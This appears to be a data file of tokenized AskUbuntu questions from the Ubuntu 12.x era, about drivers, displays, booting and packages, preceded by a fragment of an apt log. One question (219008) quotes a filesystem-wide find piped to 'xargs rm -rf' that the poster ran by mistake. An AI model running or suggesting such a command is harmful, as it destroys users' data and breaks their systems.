database ... 146005 files and directories currently installed . ) unpacking gcc-4.7-base : i386 ( from ... /gcc-4.7-base_4.7.2-2ubuntu1_i386.deb ) ... selecting previously unselected package libc6 : i386 . unpacking libc6 : i386 ( from ... /libc6_2.15-0ubuntu20_i386.deb ) ... selecting previously unselected package libgcc1 : i386 . unpacking libgcc1 : i386 ( from ... /libgcc1_1 % 3a4.7.2-2ubuntu1_i386.deb ) ... selecting previously unselected package libxau6 : i386 . unpacking libxau6 : i386 ( from ... /libxau6_1 % 3a1.0.7-1_i386.deb ) ... selecting previously unselected package libxdmcp6 : i386 . unpacking libxdmcp6 : i386 ( from ... /libxdmcp6_1 % 3a1.1.1-1_i386.deb ) ... selecting previously unselected package libxcb1 : i386 . unpacking libxcb1 : i386 ( from ... /libxcb1_1.8.1-1ubuntu1_i386.deb ) ... selecting previously unselected package libx11-6 : i386 . unpacking libx11-6 : i386 ( from ... /libx11-6_2 % 3a1.5.0-1_i386.deb ) ... selecting previously unselected package libxext6 : i386 . unpacking libxext6 : i386 ( from ... /libxext6_2 % 3a1.3.1-2_i386.deb ) ... selecting previously unselected package libxinerama1 : i386 . unpacking libxinerama1 : i386 ( from ... /libxinerama1_2 % 3a1.1.2-1_i386.deb ) ... selecting previously unselected package libxrender1 : i386 . unpacking libxrender1 : i386 ( from ... /libxrender1_1 % 3a0.9.7-1_i386.deb ) ... selecting previously unselected package libxrandr2 : i386 . unpacking libxrandr2 : i386 ( from ... /libxrandr2_2 % 3a1.4.0-1_i386.deb ) ... setting up gcc-4.7-base : i386 ( 4.7.2-2ubuntu1 ) ... setting up libc6 : i386 ( 2.15-0ubuntu20 ) ... setting up libgcc1 : i386 ( 1:4.7.2-2ubuntu1 ) ... setting up libxau6 : i386 ( 1:1.0.7-1 ) ... setting up libxdmcp6 : i386 ( 1:1.1.1-1 ) ... setting up libxcb1 : i386 ( 1.8.1-1ubuntu1 ) ... setting up libx11-6 : i386 ( 2:1.5.0-1 ) ... setting up libxext6 : i386 ( 2:1.3.1-2 ) ... setting up libxinerama1 : i386 ( 2:1.1.2-1 ) ... setting up libxrender1 : i386 ( 1:0.9.7-1 ) ... setting up libxrandr2 : i386 ( 2:1.4.0-1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place $ sudo chmod a+rx /opt/openoffice.org3/share/uno_packages/cache/uno_packages chmod : can not access `/opt/openoffice.org3/share/uno_packages/cache/uno_packages ' : no such file or directory
218982	satellite l750 screen resolution problem	i am new in ubuntu , i just replaced my windows 7 with it , but after installation i am stuck with a resolution of 1024x768 and i have tried most of the fixes i find here and this is my 3rd time reformatting my laptop due to fail attempts on getting my desired resolution which is 1368x768 . can anyone help me ? my graphics card is geforce gmt 525
218986	how to fix a broadcom 43224 ( rev . 01 ) in ubuntu 12.10 , running on a macbook pro 6,2 ?	i 've googled for 3 days so far , with no success , so i 'll be straightforward : how do you get it to work ? this is the output for lspci -v : 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) subsystem : apple inc. device 0093 flags : bus master , fast devsel , latency 0 , irq 17 memory at c1b00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge kernel modules : bcma for uname -a : linux fury 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux i 've tried with bcmwl-kernel-source , firmware-b43-installer and now i 'm out of ideas . can someone help me ? this is driving me insane ! edit : for lspci -nn | grep 0280 : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43224 802.11a/b/g/n [ 14e4:4353 ] ( rev 01 ) i can see the networks available , but when i try to connect , it gets stuck in a loop : tries to connect , fails , tries again , fails again and so on ... edit 2 : after a long break from this problem , i 've just run a few tests again and found out that , although my macbuntu still fails to connect to my home wi-fi network , it works just fine at my university ... does that help in anyway ? my home network is managed by a dual-band ( 2.4ghz and 5ghz ) 802.11n cisco e4200 wi-fi router . edit 3 ( 4 months and a bunch of updates later ) : so , now it 's working . i did nothing , really , except for updating the packages as suggested by ubunutu . now i 'm using modules wl and bcma on kernel 3.5.0-26-generic .
218987	virtual box wo n't load	i am unable to get virtual box to load since upgrading to ubuntu 12.10 . it tells me to rebuild the kernel modules by running /etc/init.d/vboxdrv setup . when i do in terminal the system can not find the linux-headers-3.2.0-32-generic . i checked /usr/src and the only headers there are for versions 3.5.0-17 and 3.5.0-18 . can anyone please tell me how to recreate the headers that the system is looking for ?
218992	screen does not wake up after suspend/ brightness will not adjust	my computer is one of these : http : //www.newegg.com/product/product.aspx ? item=n82e16834230467 asus zenbook ux32a-db51 just bought it yesterday . set to `` suspend '' when i close the lid , but when i open it up again i just get a black screen . pressing the power button does n't work , not does clicking the mouse or any key combination . the same is true if i leave the computer until it suspends . black screen , no response , have to reboot . i also ca n't seem to adjust the brightness . i put `` brightness up '' and `` brightness down '' function keys in , and when i push them it shows the brightness level as going up and down on the meter , but the screen does not actually become more or less bright . i am totally new to all of this . please tell me what additional information you need to help me and where i can find it . thanks ! edit : tried the following : sudo gedit /etc/default/grub change the line grub_cmdline_linux= '' '' into grub_cmdline_linux= '' acpi_osi=linux '' sudo update-grub restart your linux and `` acpi_backlight=vendor '' both to no avail .
218993	how to change external monitor brightness via ddc/ic ?	i would like to change brightness on my external dell u2713hm monitor via ddc/ic ( ddc wikipedia ) , it 's connected via displayport . i have the integrated intel hd4000 graphics . when i run sudo get-edid , i get : get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x11100 `` intel ( r ) sandybridge/ivybridge graphics chipset accelerated vga bios '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination supports ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call successful �������� @ l628� < `` x : k��vk� % pt�k���qo� @ ��v^��� ) p0 5up ! �gk0kd281826l �dell u2713hm �1vq edid claims 1 more blocks left *********** something special has happened ! please contact the author , matthew kern e-mail : pyrophobicman @ gmail.com please include full output from this program ( especially that to stderr ) reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call successful �������� @ l628� < `` x : k��vk� % pt�k���qo� @ ��v^��� ) p0 5up ! �gk0kd281826l �dell u2713hm �1vq edid claims 1 more blocks left edid blocks left is wrong . your edid is probably invalid . the important part is probably : monitor and video card combination supports ddc2 transfers the brightness keys on my keyboard are working properly , since i see the backlight-change-notification in ubuntu 12.10 . what can i do to get my brightness adjusted via software ? thank you for your answers .
219000	ca n't install ubuntu 12.10	i 've been having some problems with windows and i 've decided to switch to ubuntu , i downloaded 12.10 from the website and burned it to a disk , but now i run into problems . as i go through the install , i noticed it does n't give me a format my drive option , something other people have had . also , the install crashes when i select a drive , it shows no drives and the only way to get a `` ubuntu has encountered a problem '' error is to press `` - '' get an error , and then it moves on to asking for my location , if i pick the `` + '' or `` change '' i get error 141 and i have to restart my computer . right now i 'm using the `` - '' method where it gets to the `` installing '' part but it has no bar , it has the rotating circle if i move my mouse , but i 've let it sit for 20 minutes and nothing happens . i just want ubuntu installed > __ < another thing is another time i tried to install , i ran into `` no root defined '' alot . i was using wubi , but then i uninstalled wubi from windows , so while not having that dual boot anymore , here i am trying to install 12.10 what i hope to have is ubuntu at minimum . id also like to be able to have a windows os on the side but i would appreciate having ubuntu running .
219001	how do i get an alcatel x200 3g usb modem working ?	i ca n't connect my alcatel x200 in ubuntu 12.04 precise pangolin . i search some information , and i think is the kernel but i do n't know how can i fix it ... .. modeswitch work well because the `` lsusb '' return : bus 004 device 001 : id 1bbb:0000 t & a mobile phones but when i try to add a new connection ubuntu do n't recognize it . can somebody help me ? ? thank you very much ! you has solved the problem that i have three years fixing . but , the connection is `` invisible '' . is like i 'm disconnect , the icon of the connections is a triangle with the top line curve . is ok ? can i do `` visible '' the connection ? i ca n't install nothing in the ubuntu software center , and ubuntu one does n't synchronize my files ... thank you again !
219005	is it possible to install and run thunar 1.5.1 in lubuntu 12.04 ?	i hear that a new thunar ( with tabs ! ! ) is ready - see this . i have added the ppa and run the update and upgrade commands but i still have thunar 1.2.3 in synaptic , thunar looks ready for upgrade : it asks to uninstall some xfce stuff that i might hope to reinstall later but then something is fishy is this new version limited to the xfce desktop ? also , now , when i try update manager , i get this : and ... unless i remove the xubuntu-dev/xfce-4.12 ppas . so , removing thunar in synaptic and all that seems related to it , and then adding those ppas , and trying to install thunar , the following info emerges : what is to be done ?
219007	rejoining two partitions	i was curious about ubuntu and decided that i would dual-boot it and windows . after finding that i had n't used windows since , i deleted my windows partition with gparted . now , i want to use this freed disk space with ubuntu . how can i merge this disk space with the ubuntu partition ?
219008	apt-get no longer works after manually deleting folders of a previously installed application	i have been struggling all weekend , to upgrade an existing postgresql database from version 8.4 to 9.1 . i have ( had ) both versions of databases after i updated my os from 10.0.4 to 12.04 . i finally became exasperated and in a moment of lapsed judgement , i forcibly removing all 8.4 related files from my machine , using : find / -type d -name 8.4 2 > /dev/null | xargs rm -rf { } i decided the better way to have removed it would have been `apt-get remove postgresql-8.4' well when i tried that , apt-get reported : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : postgresql-8.4 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 15.5 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 304184 files and directories currently installed . ) removing postgresql-8.4 ... find : `/usr/share/postgresql/8.4/tsearch_data ' : no such file or directory dpkg : error processing postgresql-8.4 ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 errors were encountered while processing : postgresql-8.4 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i purge postgresql 8.4 from my machine ? [ [ edit ] ] after i tried apt-get install -- reinstall postgresql-8.4 , i get the following error : reading package lists ... done building dependency tree reading state information ... done suggested packages : oidentd ident-server the following new packages will be installed : postgresql-8.4 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/5,599 kb of archives . after this operation , 15.5 mb of additional disk space will be used . selecting previously unselected package postgresql-8.4 . ( reading database ... 304010 files and directories currently installed . ) unpacking postgresql-8.4 ( from ... /postgresql-8.4_8.4.14-0ubuntu12.04.2_amd64.deb ) ... setting up postgresql-client-8.4 ( 8.4.14-0ubuntu12.04.2 ) ... update-alternatives : error : alternative path /usr/share/postgresql/8.4/man/man1/psql.1.gz does n't exist . dpkg : error processing postgresql-client-8.4 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of postgresql-8.4 : postgresql-8.4 depends on postgresql-client-8.4 ; however : package postgresql-client-8.4 is not configured yet . dpkg : error processing postgresql-8.4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : postgresql-client-8.4 postgresql-8.4 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
219013	libreoffice spellcheck does nothing	i have recently installed lubuntu 12.04 on my wife 's laptop . she has been using libreoffice under ubuntu and finds that spellcheck does nothing . she has turned on the icon , tried invoking spellcheck from the tools menu but none of her deliberate mistakes get flagged . i checked that aspell is installed , and have tried also installing hunspell but still nothing reported .
219024	ubuntu 10.04 does not show ubuntu one in places menu	my hard drive crashed so i bought a new one and installed a fresh copy of ubuntu 10.04 . the ubuntu one option does not appear as an option under the `` places '' menu . i thought it would be installed by default since i do n't recall having to install it separately in the past . an ubuntu one option does appear in the system/preferences menu , but that only brings up the preferences dialog box . i checked in synaptic package manager and i see that an ubuntu one client is installed . what am i missing or doing wrong ? -bill
219025	how to get a toshiba l505 to boot usb or cd	ok , have a toshiba l505 ( not sure of the extended model number ) that got a virus on windows and will no longer will boot into that , so i 'm trying to revive it with ubuntu . problem is , when i tell it to boot into a usb image of 12.04 32- or 64-bit , 13.04 64-bit , or elementary luna 32-bit , it gives me some screen with a copyright from 2000 for intel , invariably spits out a `` media not recognized '' type of error and then says pxe-rom exiting . well , that 's annoying . so i went in with a cd ( 12.04 x86_64 having tried 32-bit in the past as well ) . boot menu , select , starts running . seeing the loading screen for ubuntu , going well ... until it 's not . again , invariably , it fails . the cd drive will cease spinning at around the same time each time and then the laptop will stop doing everything altogether ( at least , everything spins down and it goes quiet ) . as far as i can tell , it 's not to do with what function is being loaded from the cd at the time ( because that bit is variable ) . i 'd love to be able to boot from usb ( since it will be all but required going forward ) , but getting the cd to work would be wondrous too . anyone have any ideas of where i can go from here to try to fix this ? my friends and i have turned up nothing .
219026	is this the correct 12.04. download ?	i have an intel i5 chip . yesterday i visited http : //www.ubuntu.com/download/desktop and selected the 64-bit download option from the menu . the file which downloaded has the suffix '-amd64 ' . is this going to work on my intel chip ?
219027	how do i dual boot windows 8 uefi and ubuntu 12.10 ?	i have got a new samsung series 7 laptop with windows 8 where i tried to install ubuntu . it is a 64-bit system which uses uefi and has `` secure boot '' switched on in the bios by default . after i switched if off ( and set it to `` uefi and csm os '' ) i was able to install ubuntu ( ubuntu 11.10 , which recognized windows as windows vista , although it is windows 8 ) , by booting from cd with settings/change pc settings/general/advanced startup in windows 8 . but after the installation and the restart of the machine somehow ignored ubuntu and booted only windows 8 . then i tried to reinstall ubuntu 12.10 . it still only boots windows 8 . then i tried boot repair , which was not really helpful . any ideas how i can create a dual boot system with windows 8 and ubuntu 12.10 ? here is the link that boot repair generated : http : //paste.ubuntu.com/1368624/ is it necessary to create an extra efi partition with gparted ?
219032	mailserver that does n't store any data outside database ?	question : is there any opensource ( mit/bsd/lgpl license ) mail server that does n't store any of its data ( except database connection string/sql query scripts ) outside a database ? i looked at dovecot , which depends on postfix , and it ( or postfix respectively ) does store data other than logfiles outside the database , which is unacceptable . is there any mail server that does exactly this ( with the mentionend licenses ) ?
219034	ubuntu ca n't connect to wireless	i installed ubuntu 12.04 on my dell inspiron 5720 and i ca n't connect to any wireless networks , at the right top , it does n't show any networks . i tried both the 32bit and 64bit versions , i reinstalled my os several times , i googled a lot , and none of it seems to work . my pc is dual boot with windows 7 , and the wireless is working fine there so my network card is allright i searched for additional drivers in system settings and it ca n't find anything then i went to the software-center to install of the broadcom stuff but still no wireless the output of lspci -vvnn | grep 14e4 is 02:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) it does n't even show wlan
219041	hdmi not detected ubuntu 12.10 - ati radeon hd 6670	brand new to linux , so help a young blood out : - ) ( i 'm a novice/hobby programmer , but completely new to linux command syntax , etc ) brand new everything rig . fresh install of ubuntu 12.10 . ubuntu installed everything and updates . i am getting vga output and sound through standard sound port on mb . however the hdmi port on the radeon card is not recognized and not available . any help getting this detected and usable ?
219042	what 's wrong with my grub configuration ?	i have one hard drive with 2 partitions . i had windows xp and windows seven installed . i 've deleted seven partition and installed ubuntu 11.10 on it . but when i turn on the computer and the grub menu appears on the screen , i can only see my ubuntu installations and a windows 7 loader . i 've already got installed windows xp on another partition , but it does n't boot . if i want to use ubuntu alongside windows xp , 多how can i fix the problem ?
219044	ati proprietary driver over/underscan setting ignored after reboot	i installed the proprietary driver ( fglrx-updates ) on ubuntu 12.10 64-bit for my graphics card ( ati radeon hd 7570 ) . i am using two displays , one connected with dvi , one with hdmi . i set the desktop to be expanded to both screens and disabled the under scan for the hdmi screen , which is always for some reason enabled on hdmi screens . now the issue . everything was fine until i restarted my computer . after reboot , the screen connected with hdmi cable had the black borders again , meaning that the under scan is again enabled . i checked the ati ccc , and under scan was disabled . however , moving the slider to enable under scan and then back to zero fixed the issue -- temporarily . the same issue is repeated every time i restart my computer . the settings remains the same , but the computer seems to ignore it . any ideas how i could solve the issue ?
219046	configure gedit to always open in new window	i would like to configure gedit so that everytime i double click on a text file it will open on a new window instead of a new tab . how can this be done ? something like , gedit -- new-window `` file name '' , but with a double click using ubuntu 12.04 with cinnamon , and gedit - version 3.4.1
219053	binding hotkey for toggling wireless card state - system76 bonp3	recently , my wireless card shut off on my laptop ( system76 bonp3 running ubuntu 12.04 lts ) . awhile back , my keyboard had a meeting with a cup of coffee , and my f11 key no longer works . the key binding for turning my card back on happens to be fn + f11 , so i can not turn my wifi on . the only solution i can think of is to somehow change this to be bound to another key . i 'm looking for the script that handles this particular hardware switch so i can bind it elsewhere .
219055	what decent email client would you recommend ( at least better than thunderbird ) ?	i 've used thunderbird for years . i keep a huge number of emails . i move them to folders to organize or archive them , but i do n't delete anything so i have hundreds of thousands of messages . i like the way tb is conceived , and the way it works as long as the volume of data is small . but it just does n't scale . it has a lot of ridiculous design flaws such that , for example , any time consuming operation blocks the whole ui completely ( and you do n't even know for how long ) as if everything was implemented in a single monolythic all-tasks-are-blocking way . i 'm tired of it . so what is the alternative that you would recommend as an email client program with all the usual basic features one expects from any email client program ? important : i mainly use pop3 , much much more than imap , and my main account is on gmail . this question is not intended to be a rant against tb ( i admit it is , as a side effect ) ; i have highlighted its weaknesses because the answer i 'm looking for is a recomendation for a program that does n't suffer from these issues .
219059	show desktop icon in lancher in unity 2d	i would like to have a `` show desktop '' icon in my launcher . i 've seen that there are already some threads about this issue but none of them solve the problem for unity 2d ( which i 'm forced to use ) , alrady tried myunity or ccsm . is there a way to do it ? thanks in advance .
219060	fuzzy static noise on screen	my compaq 8710p laptop with a 256mb nvidia quadro 320m was working fine . i switched to the proprietary driver and tried world of warcraft under wine until i got unbearable amounts of static . i restarted the computer and the static persisted . i have now moved back to the open source driver and there is now light static that is very annoying . picture of the static : http : //imgur.com/clqmi
219061	wifi and bluetooth will not work on dell studio xps 1645	today i acquired a dell xps 1645 . ubuntu seems to run alright on it however the bluetooth is not detected and the wifi does n't work . the wifi is especially weird because i actually have the restricted driver enabled for it . it also worked for a short while when i first booted into ubuntu however now there is n't even an option to enable wireless . both 'etho ' and 'lo ' return 'no wireless extentions ' when running iwconfig and 'sudo ip link set wlan0 ' returns ' can not find device `` wlan0 '' . it uses the broadcom bcm4312 802.11b/g lp-phy which seems to be contained in plenty of certified ubuntu systems . if anyone could possibly help me out with this i 'd deeply appreciate it . i 've not had to return to windows for a good while and it 's not something i want to have to do now .
219063	how do i compress and split files with terminal ?	so what i wanted to do is compress files ( using 7zip ) and split a 600mb folder into 199mb parts , but sadly when i tried to do this task with archive manager it gave me an error , but i know that if i use terminal it will work . i looked this up in askubuntu and found out about this command : 7z a -v5m -mx0 ubuntu.7z i understand that v5m will split it to 5 mb parts and -mx0 means that it will not compress it , but i want it to compress so what should i write instead of this -mx0 ? please note : i am using 7zip because i most probably will use this file on a windows pc .
219066	ubuntu one installer win 7 can not find my ubuntu one account	when i run ubuntu one installer on win 7 home premium it gets as far as the screen that asks to log in with and existing ubuntu one account or to create a new ubuntu one account . when i enter my email and password it returns an authentication error stating that it does not recognize my email . this is odd because i can log in with the same credentials from my browser or other devices . i even went so far as to cut and paste the credentials into my browser to verify they worked there . then i cut and pasted from the same location into the ubuntu one installer -- that failed as before . any suggestions ? thanks very much .
219074	lsusb shows `` rt3572 '' but lshw shows `` generic 2800 '' driver after installing the latest ralink	i have a quick question . i just got the ae1000 linksys usb wifi card . i installed the latest drivers from ralink ( rt3572 ) . now , when i use `` lsusb '' i see `` linksys ae1000 v1 802.11n [ ralink rt3572 ] . when i use `` lshw '' i see `` driver=rt2800usb '' on wireless 802.11abgn . correct me if i 'm wrong , but i thought i should be seeing the same rt3572 number on hw and usb . thanks much .
219075	installed ubuntu for first time , used wireless for updates during installation , now saying wired network ?	i just installed 12.10 and it was using my wireless connection just fine . after the restart after installation , the network manager said i was on a wired connection and did n't have my wireless connection listed . i have a dell inspiron 1440 if that helps . it 's about two and a half years old . any help would be greatly appreciated ! thanks ! update : i reinstalled and after it did application updates and restarted to apply them , my wireless completely disappears to the point it says i only have wired .
219076	why does eclipse leave a blank box on my screen ?	i 'm running ubuntu 12.04 and whenever i go into the preferences of eclipse i get a grey bar covering all my windows . when i exit eclipse the bar does n't disappear . i 'm running sun-java but it happens with openjava , too . is there a command i can execute to kill the grey bar ? or even better , how do i stop it from happening ? i have to log out and back in to get rid of it . the grey bar is approximately 200x30 pixels and tends to show up towards the top of the screen .
219079	is there any way to take my old internet connections with me when doing a new install ?	i have /home on a seperate partition , so every time when i do a new install of ubuntu , i take my program settings with me . this works fine for most programs , but i still have to retype my wi-fi passwords after each install . instead , i 'd like to take my old passwords with me as well . how can i get that done ?
219080	should i use logical volume management and encrypt the installation on ssd ?	should i enable logical volume management on my ssd ? what i want to know is if enabling either encrypt the `` encrypt the new ubuntu installation for security '' option or the `` use lvm with the new ubuntu installation '' will increase the rate of degradation of my ssd . this is with ubuntu 12.10 and the ssd is the main drive with two standard hard drives for large data files .
219081	can anyone tell me how to get the same gnome desktop environment as the one in the photo ?	i have been using gnome fallback for more than a year , but recently i have come across this image : however , when in virtual machine ( new copy of ubuntu 12.04 ) i change to gnome 3 shell , the desktop is not even similar to the one in the photo above . i am wondering if there are others things that i am missing/have to do ... .to get to the same thing ( or similar ) that you can see in the image above . note : here is a screenshot from the virtual machine after i used these commands : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell ppa : gnome3-team/gnome3 ( click here for instructions on using ppas . )
219083	default groups for user in ubuntu ?	installed hp linux imaging and printing by using install script and something crashed . now i 'm only member of my own group and lp . which are the default groups for users in for example ubuntu 12.10 ? same as this ? out of curiosity , is there some place where this information is logged ? for example , some log file showing which groups my user was on previous boot ? is this information , ( which groups are default ) , documented somewhere ?
219086	just dash , activate just dash	is it possible to activate only dash without whole launcher ? generally , am need command to launch unity 2d dash and make launcher . is this possible ? and is it possible to install unity 2d in 12.10 ?
219087	wrong/corrupted icon in dash	i am facing a problem with the dash not showing proper/actual icons for certain applications such as google chrome and mozilla daily mail . instead of getting the standard icons for these applications , i get to see a default icon for all the applications . i have added a snapshot to show the problem . the icons that are shown in the launcher once launched or in the /usr/share/applications directory are proper . i have tried rebuilding the icon cache , but that did not help . i have also tried switching to other icons themes . this issue does not appear with gnome shell or kde . i have also tried deleting ~/.local/share/applications/menu-xdg , there was none in the first place . i am using ubuntu 12.10 . any suggestions would be appreciated .
219093	mate tries to automount floppy drive every login even if empty . how to make it stop ?	my pc has a 3.5 '' floppy drive and yes , i do use it . ( retrocomputing hobby . ) i use ubuntu 12.10 with mate . at every login , the floppy drive lights up and i get the following message box : the title translates to : it was n't possible to mount diskette disk fun fact : if i rmmod floppy and then modprobe floppy while logged in , the same message box appears again . also , if i eventually access a floppy disk , the motor wo n't stop spinning . if i do a mdir of it , after it returns , the motor stops , and then starts again . i suspect there 's some process in mate doing this . my /etc/fstab has nothing related to any removable media , just the root and swap partition . how do i make mate stop trying to access the floppy ? i repeat , i do n't want to disable the floppy . this behavior does n't happen under centos 6 and gnome 2.x .
219094	missing 'ldconfig ' and 'start-stop-daemon '	when i tried to install numpy and pandas , i got this problem . can you help me ? thank you ! dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : warning : 'start-stop-daemon ' not found in path or not executable .
219095	alarm clock from suspended mode	i want my laptop to wake up from suspended mode in the morning and alarm me to wake up using my mp3 file . how do i do it ? i tried apmsleep , but it does n't work cause my pc doesnt have `` suspend to ram '' feature in bios . what can i do ? thanks !
219096	authentication version 12.10	i 'm trying to sign in , log on , but i continually get a box saying password . not recognized . i noticed in first boot up it mentioned password failed , shadow password would be used instead . i do n't know what the shadow password is nor how to change it . i 've been into user accounts and tried changing it that way but password is still not recognized . my installation . is installed in windows could and i can only log on as quest so i ca n't download . n install software . i am a new ubuntu user , first time linux user . please . help
219097	extend ubuntu partition when no other partitions are available	my current partition is around 7gb , but i have 200gb of unused space . i 'd like to resize this partition to include some of that space . since i have no other partitions with operating systems on them , how can i resize the partition i 'm currently using ?
219098	ubuntu 12.10 over ubuntu 11.10 seems to hang	my installation of ubuntu 12.10 over ubuntu 11.10 seems to hang on `` saving installed packages '' . how long should i wait before knowing for sure that something is wrong ? i stopped it once and tried re-installing but am getting the same results . i 'm installing from a usb stick . i 'm connected to the internet using a wired connection but i 'm reading here to connect to a wi-fi network while installing . could this possibly be the issue ? i ca n't install using wi-fi at the moment as my router was fried in a brownout yesterday . i 've ordered another router online so as soon as it gets in , i 'll try again . any suggestions are appreciated ! please let me know if you need more information . it 's a 32-bit installation and i have 1 gb of memory . thanks !
219100	expand/extend disk space in ubuntu 10.04 in vmware esx	i 'm running ubuntu 10.04 in an vmware esx environment , and i need to add disk space to the primary partition . i added the disk space in esx , and the ubuntu vm sees it as unallocated space . when i start gparted , it sees the new space as well . however , in gparted it only shows the ext4 partition and the swap , but no extended partition . it will not allow me to add the unallocated space to the primary ext4 ( ... and relocate the swap to the end ) . it there a way around this ? can the new drive be expanded in the primary ext4 partition ?
219102	after a windows 8 update i do n't get my boot menu anymore	i did a software update on my 64-bit windows 8 and after restarting my computer , i no longer get my boot menu with ubuntu 12.10 , but instead get a black screen that says : error : unknown filesystem . grub rescue > this is after running boot-repair , which gave me this link : http : //paste.ubuntu.com/1369161 i really have no idea what to do . thank you in advance for any response !
219108	icons for templates	i have some templates in my ~/templates folder , but there is no icons in context menu for any of them except the default `` empty document '' . menus_have_icons is enabled how to get/set them ? ubuntu 12.04 gnome nautilus 3.4.2
219109	how do you install openvz in ubuntu 12.04 64 bit ?	the question says it all - to me , there seems to be a lack of information on how to specifically install the latest openvz kernel on ubuntu 12.04 64 bit . unfortunately for me , that 's exactly what i want to do . any help is appreciated .
219111	throttle and overheating on dell xps studio 1645	i realise there is an older thread on the very subject but that seems to be pretty dead . i just got a dell studio xps 1645 laptop and the fan noise and overheating is pretty ridiculous . this is actually a well known problem with the laptop that is apparently solved with the combination of a bios update and the purchase of their 130w charger . i plan on buying this charger as soon as possible , however i 've noticed that since installing ubuntu the fan noise has became more permanent and the overheating is quite a bit worse too . i 've had to turn it off twice to let it cool down for an hour or so because it starts seriously affecting the performance . it makes watching things , listening to music or leaving the laptop on while i sleep a real pain . if anyone has some new information on this issue or could help out in anyway at all i 'd be very grateful . thanks . edit : i installed windows to see if the problem was worsened by ubuntu and sadly it seems so . it 's still quite noisy but the temperatures are staying at a steady , much lower rate . staying on windows is something i 'd definitely prefer not to do .
219113	how do i install a bz2.bz2 file ?	i need to install the driver for my wireless card ( hp pavilion g6 ) in order to get wireless working on my computer . problem is ( as far as i can tell ) it 's not a tar.bz2 and none of the instructions for that appear to be working . i 've extracted it ( through ubuntu archive ) down to a .tar file , but that file does n't appear to work at all either . the file name is : 2011_1007_rt5390_rt5392_linux_sta_v2.5.0.3_dpo_v2.bz2.bz2 how do i install my drivers using this kind of file ?
219116	rfkill does not work for all the devices listed	when i write rfkill list i get this 0 : sony-wifi wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : yes hard blocked : no the acer-wireless does not change no matter what i do . i checked the switch gave the rfkill unblock all it works for all the other exepct for that one .
219119	how can i get firefox to use dolphin instead of nautilus by defalut ?	i installed kubuntu , and want to use dolphin when i try to save a file or open a new file , but firefox always use nautilus , how can i change this ? i find this question , but it does not work for me : how can i get firefox to use dolphin instead of nautilus ? i can neither download the kmozillahelper package , nor find the filepicker-variable in my firefox . my ubuntu : 12.10 my firefox : 16.0.2
219121	is there a way to upgrade a machine which is using software raid and lvm to 12.10 ?	i realize ubuntu has dropped the alternate cd for 12.10 , which broke this long-time user 's heart . i always do a fresh install when upgrading , but i have software raid and lvm , and as far as i can tell only lvm is supported by the regular ( only ) cd now . how can someone like me , using both , install 12.10 ? thanks !
219123	how can i find out what is locking my home directory ?	i 've run into an issue lately where my home directory somehow gets read-locked . any processes trying to read from it , whether it 's nautilus or the terminal become unresponsive for 1-2 minutes , then suddenly resume . this happens every 10-15 minutes and i 'm at a loss on how to find the culprit . is there any way to watch processes or something similar so that i can find what is causing this ?
219126	intel sandy bridge hdmi port not detected in 12.04	i have an hp g7-1150us laptop with intel sandy bridge integrated graphics . the built-in screen works fine , but the hdmi port is not detected . even when my tv is connected at boot-time , in /var/log/syslog i see : nov 18 21:37:32 steve-hp-pavilion-g7-notebook-pc kernel : [ 12.902676 ] hdmi status : codec=3 pin=5 presence_detect=0 eld_valid=0 the systems settings - > displays tools does n't detect any additional monitors , even when i have my tv connected at boot time . i have the tv set for input on the connected hdmi port , which works fine with other devices . i have seen lots of discussion about sound problems and resolution problems , but i have n't seen anyone offering solutions to a failure to detect the port in the first place .
219132	blacklist ethernet driver	i 'm using quantal quetzal 12.10 how can i find out what my ethernet 's driver is and how can i blacklist it ? since i believe it is the source of driver conflict in my machine , i would like to try it out .
219141	what is hybrid suspend	what is hybrid suspend ? please also add other info such as packages , etc . a how-to would be great too .
219144	ubuntu 12.10 does n't detect my phone	i have sony experia arc . it worked fine on windows 7 but now , since i 've installed ubuntu 12.10 my p.c . does n't detect my phone .
219145	suggestions about php editors and file sync programs	i 'm working with ubuntu and lately i decided to learn php . i have everything setup and i 'm currently using aptana 3 as my php editor and for file sync . it seems like the process for file sync is too much , it has to check all files just to upload 1 file . so if someone can tell me how to update a file at once without delay , that 's welcomed . i find aptana not being what i like . it 's a good editor , but i would like to know if there are alternatives out there . can someone suggest a good php editor for ubuntu ?
